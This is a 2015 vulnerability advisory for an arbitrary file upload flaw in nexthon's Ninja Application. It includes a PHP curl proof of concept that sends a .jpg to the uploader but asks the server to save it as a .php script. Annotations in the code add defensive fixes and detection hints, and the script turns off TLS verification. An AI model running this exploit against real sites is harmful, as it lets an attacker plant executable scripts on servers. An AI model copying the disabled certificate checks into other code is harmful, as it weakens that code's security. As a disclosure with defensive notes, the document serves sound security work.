#- Title : Ninja Application Remote Vulnerability
#- Vendor : nexthon
#- Platform : PHP
#- Platform : PHP
#- Tested on : Windows 8 , Linux
#- Date : 9/16/15
#- Vuln Code : {"jsonrpc" : "2.0", "result" : null, "id" : "id", "cleanFileName" : ""}
#- Vulnerability : /ninja-applications/fufu/controllers/uploader/upload.php
Proof of concept (the request uploads a .jpg file while asking the endpoint to store it under a .php name):
<?php
// Sends one multipart POST to the uploader endpoint named in the advisory.
// The uploaded file and the requested stored name carry different
// extensions (.jpg vs .php); that mismatch is the whole demonstration.
//
// NOTE(review): the server-side upload.php is not shown on this page, so the
// root cause is inferred: presumably the endpoint takes the stored file name
// from the client-supplied "name" field without validating its extension.
//
// Defensive takeaways:
//  - derive the stored file name server-side and allow-list extensions
//    instead of trusting the "name" field;
//  - keep the upload directory outside the web root, or disable script
//    execution in it;
//  - this request carries no credentials or session cookie, so verify that
//    the endpoint enforces authentication;
//  - for detection, inspect request bodies sent to this path for a "name"
//    field ending in a script extension, and watch for new script files
//    appearing in the upload directory.
$url = "http://target/ninja-applications/fufu/controllers/uploader/upload.php"; // placeholder host; the path is the one listed in the advisory header
// Passing an array to CURLOPT_POSTFIELDS makes curl encode the body as multipart/form-data.
$post = array
(
// Legacy "@" prefix: asks curl to attach the named local file. Only old PHP
// releases honour it; newer ones send the string literally as a form value.
"file" => "@3xploi7.jpg",
// Client-chosen name with a script extension, unlike the file above.
"name" => "3xploi7.php"
);
$ch = curl_init ("$url");
// Return the response body from curl_exec() instead of printing it directly.
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
// Follow HTTP redirects issued by the server.
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
// Browser-like User-Agent, so the User-Agent alone does not distinguish this request in logs.
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
// Give up if the connection is not established within 5 seconds.
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
// TLS certificate and host-name verification are switched off. This has no
// effect on the http:// URL above and should not be copied into other code.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
// The leading "@" suppresses any warning or notice PHP raises for this call.
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
// Print the server's reply. NOTE(review): presumably the JSON listed under
// "Vuln Code" in the header is the reply to expect; confirm.
echo $data;
?>
Result : Here